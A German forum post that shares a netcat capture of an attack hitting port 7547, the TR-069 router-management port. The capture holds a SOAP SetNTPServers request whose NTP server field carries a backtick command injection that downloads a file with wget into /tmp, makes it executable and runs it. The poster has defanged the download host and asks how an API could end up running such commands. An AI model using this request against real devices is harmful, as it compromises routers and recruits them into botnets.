Habe gerade mit netcat ein bisschen mitgeschnitten.
Code
listening on [any] 7547 ...
connect to [192.168.99.103] from (UNKNOWN) [60.231.32.22] 49555
POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /tmp;wget http://l.o~~~~~~calhost.host/2;chmod 777 2;./2`</NewNTPServer1>
<NewNTPServer2 />
<NewNTPServer3 />
<NewNTPServer4 />
<NewNTPServer5 />
</u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Alles anzeigen
Die Pipes habe ich in die Download URL gebaut damit sie nicht anklickbar wird oder jemand auf die Idee kommt die aufzurufen.
Kann mir jemand erklären wie man eine API Baut die Backtick Commands stumpf ausführt? Es will nicht in meinen Kopf rein wie das gehehen soll.